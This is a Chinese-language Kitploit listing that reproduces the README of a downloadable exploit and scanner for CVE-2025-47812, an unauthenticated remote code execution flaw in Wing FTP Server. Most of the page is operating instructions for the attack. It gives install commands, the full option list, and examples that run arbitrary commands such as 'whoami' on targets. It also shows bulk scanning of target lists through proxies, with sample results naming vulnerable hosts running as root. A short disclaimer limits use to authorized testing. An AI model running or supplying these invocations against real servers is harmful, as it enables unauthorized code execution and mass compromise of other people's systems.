Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-47812 — 针对 CVE-2025-47812 的利用和扫描器,针对 Wing FTP Server 未认证远程代码执行,支持单目标、批量扫描、代理和多种输出格式。 | Kitploit
工具/GitHubGitHub/0xjuarez/cve-2025-47812
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

针对 CVE-2025-47812 的利用和扫描器,针对 Wing FTP Server 未认证远程代码执行,支持单目标、批量扫描、代理和多种输出格式。

查看仓库
146个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 Wing FTP Exploit - CVE-2025-47812

针对 Wing FTP Server CVE-2025-47812 的增强型利用工具 - 未授权远程代码执行 (RCE)

🔧 安装

克隆此仓库并进入目录:

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

或者直接下载 CVE-2025-47812.py 脚本并运行它。

🚀 使用方法

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit for Wing FTP Server CVE-2025-47812 - enhanced version

options:
  -h, --help            显示此帮助信息
  -u URL, --url URL     目标URL(例如 http://192.168.1.100:5466)
  -f FILE, --file FILE  包含URL列表的文件(每行一个)
  -c COMMAND, --command COMMAND
                        要执行的命令(默认: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        用户名(default: anonymous)
  -P PASSWORD, --password PASSWORD
                        密码(default: 空)
  --check               检查模式:仅检测是否易受攻击(使用无害命令)
  -v, --verbose         详细模式(显示详细信息)
  --proxy PROXY         代理(例如 http://127.0.0.1:8080)
  --timeout TIMEOUT     超时秒数(default: 10)
  -o OUTPUT, --output OUTPUT
                        保存结果的文件
  --output-format {txt,json,csv}
                        输出格式(default: txt)
  --threads THREADS     扫描多个目标时的线程数(default: 5)
  --no-progress         隐藏进度条

🎯 基本示例

测试单个目标并执行命令:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

检查模式(仅检测漏洞):

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

从文件扫描多个目标:

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json

使用代理并显示详细信息:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 目标文件结构

文件应包含每行一个URL,例如:

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466

📊 输出格式

TXT

root@kitploit:~
http://192.168.1.10:5466 - VULNERABLE - 用户: root
http://192.168.1.11:5466 - SEGURO - 不易受攻击

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "用户: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,用户: root

⚠️ 警告

此利用工具仅供教育目的和授权安全测试使用。未经明确同意对系统进行未经授权的使用是违法的,并可能带来严重的法律后果。作者不承担任何滥用责任。

🤝 致谢

  • 原作者: Sheikh Mohammad Hasan (4m3rr0r) – 发现与基础利用。
  • 改进与重构: 0xJuarez – 添加了大规模扫描、颜色、代理支持、多种输出格式以及可用性改进。

如果你喜欢这个作品,别忘了在GitHub上点个星 ⭐!

📄 许可证

本项目基于 MIT 许可证授权 – 详情请见 LICENSE 文件。

下载工具